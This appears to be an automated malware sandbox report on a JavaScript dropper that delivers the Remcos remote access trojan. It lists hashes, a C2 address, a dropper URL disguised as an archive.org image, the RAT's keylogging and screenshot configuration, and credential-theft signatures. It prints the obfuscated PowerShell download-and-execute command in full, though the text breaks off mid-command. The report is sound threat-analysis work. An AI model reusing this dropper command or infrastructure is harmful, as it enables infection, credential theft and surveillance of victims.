Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
27-08-2024 05:48
General
-
Target
INQUIRY#46789-AUG24.js
-
Size
615KB
-
MD5
7033a2e8e2361ad4f724d22ad7497367
-
SHA1
f01c570285cdaff11f776e32a3b0ed2753a598d9
-
SHA256
99ddcd66d69ad38f056e4084b25a562060ab4f368d1af01bfa07b0c4923034f1
-
SHA512
f9baa9c3a5997ba4d3024ba88ae8be5f2ba8b87e8176c4b7bf046c9597cde111283168ce98942bf97aeae97fe7e912d7d0afadc3d6e77532253d1927e61a47b5
-
SSDEEP
12288:ghScyHWGLROIXQrKycPfjTZoZe3UuP69JzRt4aCx5RI3gjY8N/U5woKNA2fGhFXp:hVZOLsWafCUGABS
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
exe.dropper
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
Extracted
Family
remcos
Botnet
AUG
C2
64.188.18.85:4455
Attributes
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
xlorers.exe
-
copy_folder
xlorers
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-R2Z38E
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
-
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
-
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious behavior: MapViewOfSection 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 39 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\INQUIRY#46789-AUG24.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⬄ ⚅ ⢝ ⚱ ╏Bp⬄ ⚅ ⢝ ⚱ ╏G0⬄ ⚅ ⢝ ⚱ ╏YQBn⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏VQBy⬄ ⚅ ⢝ ⚱ ╏Gw⬄ ⚅ ⢝ ⚱ ╏I⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏9⬄ ⚅ ⢝ ⚱ ╏C⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏JwBo⬄ ⚅ ⢝ ⚱ ╏HQ⬄ ⚅ ⢝ ⚱ ╏d⬄ ⚅ ⢝ ⚱ ╏Bw⬄ ⚅ ⢝ ⚱ ╏HM⬄ ⚅ ⢝ ⚱ ╏Og⬄ ⚅ ⢝ ⚱ ╏v⬄ ⚅ ⢝ ⚱ ╏C8⬄ ⚅ ⢝ ⚱ ╏aQBh⬄ ⚅ ⢝ ⚱ ╏DY⬄ ⚅ ⢝ ⚱ ╏M⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏x⬄ ⚅ ⢝ ⚱ ╏DY⬄ ⚅ ⢝ ⚱ ╏M⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏2⬄ ⚅ ⢝ ⚱ ╏C4⬄ ⚅ ⢝ ⚱ ╏dQBz⬄ ⚅ ⢝ ⚱ ╏C4⬄ ⚅ ⢝ ⚱ ╏YQBy⬄ ⚅ ⢝ ⚱ ╏GM⬄ ⚅ ⢝ ⚱ ╏a⬄ ⚅ ⢝ ⚱ ╏Bp⬄ ⚅ ⢝ ⚱ ╏HY⬄ ⚅ ⢝ ⚱ ╏ZQ⬄ ⚅ ⢝ ⚱ ╏u⬄ ⚅ ⢝ ⚱ ╏G8⬄ ⚅ ⢝ ⚱ ╏cgBn⬄ ⚅ ⢝ ⚱ ╏C8⬄ ⚅ ⢝ ⚱ ╏MQ⬄ ⚅ ⢝ ⚱ ╏w⬄ ⚅ ⢝ ⚱ ╏C8⬄ ⚅ ⢝ ⚱ ╏aQB0⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏bQBz⬄ ⚅ ⢝ ⚱ ╏C8⬄ ⚅ ⢝ ⚱ ╏Z⬄ ⚅ ⢝ ⚱ ╏Bl⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏d⬄ ⚅ ⢝ ⚱ ╏Bo⬄ ⚅ ⢝ ⚱ ╏G4⬄ ⚅ ⢝ ⚱ ╏bwB0⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏Xw⬄ ⚅ ⢝ ⚱ ╏y⬄ ⚅ ⢝ ⚱ ╏D⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏Mg⬄ ⚅ ⢝ ⚱ ╏0⬄ ⚅ ⢝ ⚱ ╏D⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏Nw⬄ ⚅ ⢝ ⚱ ╏v⬄ ⚅ ⢝ ⚱ ╏GQ⬄ ⚅ ⢝ ⚱ ╏ZQBh⬄ ⚅ ⢝ ⚱ ╏HQ⬄ ⚅ ⢝ ⚱ ╏a⬄ ⚅ ⢝ ⚱ ╏Bu⬄ ⚅ ⢝ ⚱ ╏G8⬄ ⚅ ⢝ ⚱ ╏d⬄ ⚅ ⢝ ⚱ ╏Bl⬄ ⚅ ⢝ ⚱ ╏C4⬄ ⚅ ⢝ ⚱ ╏agBw⬄ ⚅ ⢝ ⚱ ╏Gc⬄ ⚅ ⢝ ⚱ ╏Jw⬄ ⚅ ⢝ ⚱ ╏7⬄ ⚅ ⢝ ⚱ ╏CQ⬄ ⚅ ⢝ ⚱ ╏dwBl⬄ ⚅ ⢝ ⚱ ╏GI⬄ ⚅ ⢝ ⚱ ╏QwBs⬄ ⚅ ⢝ ⚱ ╏Gk⬄ ⚅ ⢝ ⚱ ╏ZQBu⬄ ⚅ ⢝ ⚱ ╏HQ⬄ ⚅ ⢝ ⚱ ╏I⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏9⬄ ⚅ ⢝ ⚱ ╏C⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏TgBl⬄ ⚅ ⢝ ⚱ ╏Hc⬄ ⚅ ⢝ ⚱ ╏LQBP⬄ ⚅ ⢝ ⚱ ╏GI⬄ ⚅ ⢝ ⚱ ╏agBl⬄ ⚅ ⢝ ⚱ ╏GM⬄ ⚅ ⢝ ⚱ ╏d⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏g⬄ ⚅ ⢝ ⚱ ╏FM⬄ ⚅ ⢝ ⚱ ╏eQBz⬄ ⚅ ⢝ ⚱ ╏HQ⬄ ⚅ ⢝ ⚱ ╏ZQBt⬄ ⚅ ⢝ ⚱ ╏C4⬄ ⚅ ⢝ ⚱ ╏TgBl⬄ ⚅ ⢝ ⚱ ╏HQ⬄ ⚅ ⢝ ⚱ ╏LgBX⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏YgBD⬄ ⚅ ⢝ ⚱ ╏Gw⬄ ⚅ ⢝ ⚱ ╏aQBl⬄ ⚅ ⢝ ⚱ ╏G4⬄ ⚅ ⢝ ⚱ ╏d⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏7⬄ ⚅ ⢝ ⚱ ╏CQ⬄ ⚅ ⢝ ⚱ ╏aQBt⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏ZwBl⬄ ⚅ ⢝ ⚱ ╏EI⬄ ⚅ ⢝ ⚱ ╏eQB0⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏cw⬄ ⚅ ⢝ ⚱ ╏g⬄ ⚅ ⢝ ⚱ ╏D0⬄ ⚅ ⢝ ⚱ ╏I⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏k⬄ ⚅ ⢝ ⚱ ╏Hc⬄ ⚅ ⢝ ⚱ ╏ZQBi⬄ ⚅ ⢝ ⚱ ╏EM⬄ ⚅ ⢝ ⚱ ╏b⬄ ⚅ ⢝ ⚱ ╏Bp⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏bgB0⬄ ⚅ ⢝ ⚱ ╏C4⬄ ⚅ ⢝ ⚱ ╏R⬄ ⚅ ⢝ ⚱ ╏Bv⬄ ⚅ ⢝ ⚱ ╏Hc⬄ ⚅ ⢝ ⚱ ╏bgBs⬄ ⚅ ⢝ ⚱ ╏G8⬄ ⚅ ⢝ ⚱ ╏YQBk⬄ ⚅ ⢝ ⚱ ╏EQ⬄ ⚅ ⢝ ⚱ ╏YQB0⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏K⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏k⬄ ⚅ ⢝ ⚱ ╏Gk⬄ ⚅ ⢝ ⚱ ╏bQBh⬄ ⚅ ⢝ ⚱ ╏Gc⬄ ⚅ ⢝ ⚱ ╏ZQBV⬄ ⚅ ⢝ ⚱ ╏HI⬄ ⚅ ⢝ ⚱ ╏b⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏p⬄ ⚅ ⢝ ⚱ ╏Ds⬄ ⚅ ⢝ ⚱ ╏J⬄ ⚅ ⢝ ⚱ ╏Bp⬄ ⚅ ⢝ ⚱ ╏G0⬄ ⚅ ⢝ ⚱ ╏YQBn⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏V⬄ ⚅ ⢝ ⚱ ╏Bl⬄ ⚅ ⢝ ⚱ ╏Hg⬄ ⚅ ⢝ ⚱ ╏d⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏g⬄ ⚅ ⢝ ⚱ ╏D0⬄ ⚅ ⢝ ⚱ ╏I⬄ ⚅ ⢝ ⚱ ╏Bb⬄ ⚅ ⢝ ⚱ ╏FM⬄ ⚅ ⢝ ⚱ ╏eQBz⬄ ⚅ ⢝ ⚱ ╏HQ⬄ ⚅ ⢝ ⚱ ╏ZQBt⬄ ⚅ ⢝ ⚱ ╏C4⬄ ⚅ ⢝ ⚱ ╏V⬄ ⚅ ⢝ ⚱ ╏Bl⬄ ⚅ ⢝ ⚱ ╏Hg⬄ ⚅ ⢝ ⚱ ╏d⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏u⬄ ⚅ ⢝ ⚱ ╏EU⬄ ⚅ ⢝ ⚱ ╏bgBj⬄ ⚅ ⢝ ⚱ ╏G8⬄ ⚅ ⢝ ⚱ ╏Z⬄ ⚅ ⢝ ⚱ ╏Bp⬄ ⚅ ⢝ ⚱ ╏G4⬄ ⚅ ⢝ ⚱ ╏ZwBd⬄ ⚅ ⢝ ⚱ ╏Do⬄ ⚅ ⢝ ⚱ ╏OgBV⬄ ⚅ ⢝ ⚱ ╏FQ⬄ ⚅ ⢝ ⚱ ╏Rg⬄ ⚅ ⢝ ⚱ ╏4⬄ ⚅ ⢝ ⚱ ╏C4⬄ ⚅ ⢝ ⚱ ╏RwBl⬄ ⚅ ⢝ ⚱ ╏HQ⬄ ⚅ ⢝ ⚱ ╏UwB0⬄ ⚅ ⢝ ⚱ ╏HI⬄ ⚅ ⢝ ⚱ ╏aQBu⬄ ⚅ ⢝ ⚱ ╏Gc⬄ ⚅ ⢝ ⚱ ╏K⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏k⬄ ⚅ ⢝ ⚱ ╏Gk⬄ ⚅ ⢝ ⚱ ╏bQBh⬄ ⚅ ⢝ ⚱ ╏Gc⬄ ⚅ ⢝ ⚱ ╏ZQBC⬄ ⚅ ⢝ ⚱ ╏Hk⬄ ⚅ ⢝ ⚱ ╏d⬄ ⚅ ⢝ ⚱ ╏Bl⬄ ⚅ ⢝ ⚱ ╏HM⬄ ⚅ ⢝ ⚱ ╏KQ⬄ ⚅ ⢝ ⚱ ╏7⬄ ⚅ ⢝ ⚱ ╏CQ⬄ ⚅ ⢝ ⚱ ╏cwB0⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏cgB0⬄ ⚅ ⢝ ⚱ ╏EY⬄ ⚅ ⢝ ⚱ ╏b⬄ ⚅ ⢝ ⚱ ╏Bh⬄ ⚅ ⢝ ⚱ ╏Gc⬄ ⚅ ⢝ ⚱ ╏I⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏9⬄ ⚅ ⢝ ⚱ ╏C⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏Jw⬄ ⚅ ⢝ ⚱ ╏8⬄ ⚅ ⢝ ⚱ ╏Dw⬄ ⚅ ⢝ ⚱ ╏QgBB⬄ ⚅ ⢝ ⚱ ╏FM⬄ ⚅ ⢝ ⚱ ╏RQ⬄ ⚅ ⢝ ⚱ ╏2⬄ ⚅ ⢝ ⚱ ╏DQ⬄ ⚅ ⢝ ⚱ ╏XwBT⬄ ⚅ ⢝ ⚱ ╏FQ⬄ ⚅ ⢝ ⚱ ╏QQBS⬄ ⚅ ⢝ ⚱ ╏FQ⬄ ⚅ ⢝ ⚱ ╏Pg⬄ ⚅ ⢝ ⚱ ╏+⬄ ⚅ ⢝ ⚱ ╏Cc⬄ ⚅ ⢝ ⚱ ╏Ow⬄ ⚅ ⢝ ⚱ ╏k⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏bgBk⬄ ⚅ ⢝ ⚱ ╏EY⬄ ⚅ ⢝ ⚱ ╏b⬄ ⚅ ⢝ ⚱ ╏Bh⬄ ⚅ ⢝ ⚱ ╏Gc⬄ ⚅ ⢝ ⚱ ╏I⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏9⬄ ⚅ ⢝ ⚱ ╏C⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏Jw⬄ ⚅ ⢝ ⚱ ╏8⬄ ⚅ ⢝ ⚱ ╏Dw⬄ ⚅ ⢝ ⚱ ╏QgBB⬄ ⚅ ⢝ ⚱ ╏FM⬄ ⚅ ⢝ ⚱ ╏RQ⬄ ⚅ ⢝ ⚱ ╏2⬄ ⚅ ⢝ ⚱ ╏DQ⬄ ⚅ ⢝ ⚱ ╏XwBF⬄ ⚅ ⢝ ⚱ ╏E4⬄ ⚅ ⢝ ⚱ ╏R⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏+⬄ ⚅ ⢝ ⚱ ╏D4⬄ ⚅ ⢝ ⚱ ╏Jw⬄ ⚅ ⢝ ⚱ ╏7⬄ ⚅ ⢝ ⚱ ╏CQ⬄ ⚅ ⢝ ⚱ ╏cwB0⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏cgB0⬄ ⚅ ⢝ ⚱ ╏Ek⬄ ⚅ ⢝ ⚱ ╏bgBk⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏e⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏g⬄ ⚅ ⢝ ⚱ ╏D0⬄ ⚅ ⢝ ⚱ ╏I⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏k⬄ ⚅ ⢝ ⚱ ╏Gk⬄ ⚅ ⢝ ⚱ ╏bQBh⬄ ⚅ ⢝ ⚱ ╏Gc⬄ ⚅ ⢝ ⚱ ╏ZQBU⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏e⬄ ⚅ ⢝ ⚱ ╏B0⬄ ⚅ ⢝ ⚱ ╏C4⬄ ⚅ ⢝ ⚱ ╏SQBu⬄ ⚅ ⢝ ⚱ ╏GQ⬄ ⚅ ⢝ ⚱ ╏ZQB4⬄ ⚅ ⢝ ⚱ ╏E8⬄ ⚅ ⢝ ⚱ ╏Zg⬄ ⚅ ⢝ ⚱ ╏o⬄ ⚅ ⢝ ⚱ ╏CQ⬄ ⚅ ⢝ ⚱ ╏cwB0⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏cgB0⬄ ⚅ ⢝ ⚱ ╏EY⬄ ⚅ ⢝ ⚱ ╏b⬄ ⚅ ⢝ ⚱ ╏Bh⬄ ⚅ ⢝ ⚱ ╏Gc⬄ ⚅ ⢝ ⚱ ╏KQ⬄ ⚅ ⢝ ⚱ ╏7⬄ ⚅ ⢝ ⚱ ╏CQ⬄ ⚅ ⢝ ⚱ ╏ZQBu⬄ ⚅ ⢝ ⚱ ╏GQ⬄ ⚅ ⢝ ⚱ ╏SQBu⬄ ⚅ ⢝ ⚱ ╏GQ⬄ ⚅ ⢝ ⚱ ╏ZQB4⬄ ⚅ ⢝ ⚱ ╏C⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏PQ⬄ ⚅ ⢝ ⚱ ╏g⬄ ⚅ ⢝ ⚱ ╏CQ⬄ ⚅ ⢝ ⚱ ╏aQBt⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏ZwBl⬄ ⚅ ⢝ ⚱ ╏FQ⬄ ⚅ ⢝ ⚱ ╏ZQB4⬄ ⚅ ⢝ ⚱ ╏HQ⬄ ⚅ ⢝ ⚱ ╏LgBJ⬄ ⚅ ⢝ ⚱ ╏G4⬄ ⚅ ⢝ ⚱ ╏Z⬄ ⚅ ⢝ ⚱ ╏Bl⬄ ⚅ ⢝ ⚱ ╏Hg⬄ ⚅ ⢝ ⚱ ╏TwBm⬄ ⚅ ⢝ ⚱ ╏Cg⬄ ⚅ ⢝ ⚱ ╏J⬄ ⚅ ⢝ ⚱ ╏Bl⬄ ⚅ ⢝ ⚱ ╏G4⬄ ⚅ ⢝ ⚱ ╏Z⬄ ⚅ ⢝ ⚱ ╏BG⬄ ⚅ ⢝ ⚱ ╏Gw⬄ ⚅ ⢝ ⚱ ╏YQBn⬄ ⚅ ⢝ ⚱ ╏Ck⬄ ⚅ ⢝ ⚱ ╏Ow⬄ ⚅ ⢝ ⚱ ╏k⬄ ⚅ ⢝ ⚱ ╏HM⬄ ⚅ ⢝ ⚱ ╏d⬄ ⚅ ⢝ ⚱ ╏Bh⬄ ⚅ ⢝ ⚱ ╏HI⬄ ⚅ ⢝ ⚱ ╏d⬄ ⚅ ⢝ ⚱ ╏BJ⬄ ⚅ ⢝ ⚱ ╏G4⬄ ⚅ ⢝ ⚱ ╏Z⬄ ⚅ ⢝ ⚱ ╏Bl⬄ ⚅ ⢝ ⚱ ╏Hg⬄ ⚅ ⢝ ⚱ ╏I⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏t⬄ ⚅ ⢝ ⚱ ╏Gc⬄ ⚅ ⢝ ⚱ ╏ZQ⬄ ⚅ ⢝ ⚱ ╏g⬄ ⚅ ⢝ ⚱ ╏D⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏I⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏t⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏bgBk⬄ ⚅ ⢝ ⚱ ╏C⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏J⬄ ⚅ ⢝ ⚱ ╏Bl⬄ ⚅ ⢝ ⚱ ╏G4⬄ ⚅ ⢝ ⚱ ╏Z⬄ ⚅ ⢝ ⚱ ╏BJ⬄ ⚅ ⢝ ⚱ ╏G4⬄ ⚅ ⢝ ⚱ ╏Z⬄ ⚅ ⢝ ⚱ ╏Bl⬄ ⚅ ⢝ ⚱ ╏Hg⬄ ⚅ ⢝ ⚱ ╏I⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏t⬄ ⚅ ⢝ ⚱ ╏Gc⬄ ⚅ ⢝ ⚱ ╏d⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏g⬄ ⚅ ⢝ ⚱ ╏CQ⬄ ⚅ ⢝ ⚱ ╏cwB0⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏cgB0⬄ ⚅ ⢝ ⚱ ╏Ek⬄ ⚅ ⢝ ⚱ ╏bgBk⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏e⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏7⬄ ⚅ ⢝ ⚱ ╏CQ⬄ ⚅ ⢝ ⚱ ╏cwB0⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏cgB0⬄ ⚅ ⢝ ⚱ ╏Ek⬄ ⚅ ⢝ ⚱ ╏bgBk⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏e⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏g⬄ ⚅ ⢝ ⚱ ╏Cs⬄ ⚅ ⢝ ⚱ ╏PQ⬄ ⚅ ⢝ ⚱ ╏g⬄ ⚅ ⢝ ⚱ ╏CQ⬄ ⚅ ⢝ ⚱ ╏cwB0⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏cgB0⬄ ⚅ ⢝ ⚱ ╏EY⬄ ⚅ ⢝ ⚱ ╏b⬄ ⚅ ⢝ ⚱ ╏Bh⬄ ⚅ ⢝ ⚱ ╏Gc⬄ ⚅ ⢝ ⚱ ╏LgBM⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏bgBn⬄ ⚅ ⢝ ⚱ ╏HQ⬄ ⚅ ⢝ ⚱ ╏a⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏7⬄ ⚅ ⢝ ⚱ ╏CQ⬄ ⚅ ⢝ ⚱ ╏YgBh⬄ ⚅ ⢝ ⚱ ╏HM⬄ ⚅ ⢝ ⚱ ╏ZQ⬄ ⚅ ⢝ ⚱ ╏2⬄ ⚅ ⢝ ⚱ ╏DQ⬄ ⚅ ⢝ ⚱ ╏T⬄ ⚅ ⢝ ⚱ ╏Bl⬄ ⚅ ⢝ ⚱ ╏G4⬄ ⚅ ⢝ ⚱ ╏ZwB0⬄ ⚅ ⢝ ⚱ ╏Gg⬄ ⚅ ⢝ ⚱ ╏I⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏9⬄ ⚅ ⢝ ⚱ ╏C⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏J⬄ ⚅ ⢝ ⚱ ╏Bl⬄ ⚅ ⢝ ⚱ ╏G4⬄ ⚅ ⢝ ⚱ ╏Z⬄ ⚅ ⢝ ⚱ ╏BJ⬄ ⚅ ⢝ ⚱ ╏G4⬄ ⚅ ⢝ ⚱ ╏Z⬄ ⚅ ⢝ ⚱ ╏Bl⬄ ⚅ ⢝ ⚱ ╏Hg⬄ ⚅ ⢝ ⚱ ╏I⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏t⬄ ⚅ ⢝ ⚱ ╏C⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏J⬄ ⚅ ⢝ ⚱ ╏Bz⬄ ⚅ ⢝ ⚱ ╏HQ⬄ ⚅ ⢝ ⚱ ╏YQBy⬄ ⚅ ⢝ ⚱ ╏HQ⬄ ⚅ ⢝ ⚱ ╏SQBu⬄ ⚅ ⢝ ⚱ ╏GQ⬄ ⚅ ⢝ ⚱ ╏ZQB4⬄ ⚅ ⢝ ⚱ ╏Ds⬄ ⚅ ⢝ ⚱ ╏J⬄ ⚅ ⢝ ⚱ ╏Bi⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏cwBl⬄ ⚅ ⢝ ⚱ ╏DY⬄ ⚅ ⢝ ⚱ ╏N⬄ ⚅ ⢝ ⚱ ╏BD⬄ ⚅ ⢝ ⚱ ╏G8⬄ ⚅ ⢝ ⚱ ╏bQBt⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏bgBk⬄ ⚅ ⢝ ⚱ ╏C⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏PQ⬄ ⚅ ⢝ ⚱ ╏g⬄ ⚅ ⢝ ⚱ ╏CQ⬄ ⚅ ⢝ ⚱ ╏aQBt⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏ZwBl⬄ ⚅ ⢝ ⚱ ╏FQ⬄ ⚅ ⢝ ⚱ ╏ZQB4⬄ ⚅ ⢝ ⚱ ╏HQ⬄ ⚅ ⢝ ⚱ ╏LgBT⬄ ⚅ ⢝ ⚱ ╏HU⬄ ⚅ ⢝ ⚱ ╏YgBz⬄ ⚅ ⢝ ⚱ ╏HQ⬄ ⚅ ⢝ ⚱ ╏cgBp⬄ ⚅ ⢝ ⚱ ╏G4⬄ ⚅ ⢝ ⚱ ╏Zw⬄ ⚅ ⢝ ⚱ ╏o⬄ ⚅ ⢝ ⚱ ╏CQ⬄ ⚅ ⢝ ⚱ ╏cwB0⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏cgB0⬄ ⚅ ⢝ ⚱ ╏Ek⬄ ⚅ ⢝ ⚱ ╏bgBk⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏e⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏s⬄ ⚅ ⢝ ⚱ ╏C⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏J⬄ ⚅ ⢝ ⚱ ╏Bi⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏cwBl⬄ ⚅ ⢝ ⚱ ╏DY⬄ ⚅ ⢝ ⚱ ╏N⬄ ⚅ ⢝ ⚱ ╏BM⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏bgBn⬄ ⚅ ⢝ ⚱ ╏HQ⬄ ⚅ ⢝ ⚱ ╏a⬄ ⚅ ⢝ ⚱ ╏⬄ ⚅ ⢝ ⚱ ╏p⬄ ⚅ ⢝ ⚱ ╏Ds⬄ ⚅ ⢝ ⚱ ╏J⬄ ⚅ ⢝ ⚱ ╏Bj⬄ ⚅ ⢝ ⚱ ╏G8⬄ ⚅ ⢝ ⚱ ╏bQBt⬄ ⚅ ⢝ ⚱ ╏GE⬄ ⚅ ⢝ ⚱ ╏bgBk⬄ ⚅ ⢝ ⚱ ╏EI⬄ ⚅ ⢝ ⚱ ╏eQB0⬄ ⚅ ⢝ ⚱ ╏GU⬄ ⚅ ⢝ ⚱ ╏cw⬄ ⚅ ⢝ ⚱ ╏g⬄ ⚅ ⢝ ⚱ ╏D0⬄ ⚅ ⢝ ⚱ ╏I⬄ ⚅ ⢝ ⚱ ╏Bb⬄ ⚅ ⢝ ⚱ ╏FM⬄ ⚅ ⢝ ⚱ ╏eQBz⬄ ⚅ ⢝ ⚱ ╏HQ⬄ ⚅ ⢝ ⚱ ╏ZQBt⬄ ⚅ ⢝ ⚱ ╏C4⬄ ⚅ ⢝ ⚱ ╏QwBv⬄ ⚅ ⢝ ⚱ ╏G4⬄ ⚅ ⢝ ⚱ ╏dgBl⬄ ⚅ ⢝ ⚱ ╏HI⬄ ⚅ ⢝ ⚱ ╏d⬄ ⚅ ⢝ ⚱ ╏Bd⬄ ⚅ ⢝ ⚱ ╏Do⬄ ⚅ ⢝ ⚱ ╏OgBG⬄ ⚅ ⢝ ⚱ ╏HI⬄ ⚅ ⢝ ⚱ ╏bwBt⬄ ⚅ ⢝ ⚱ 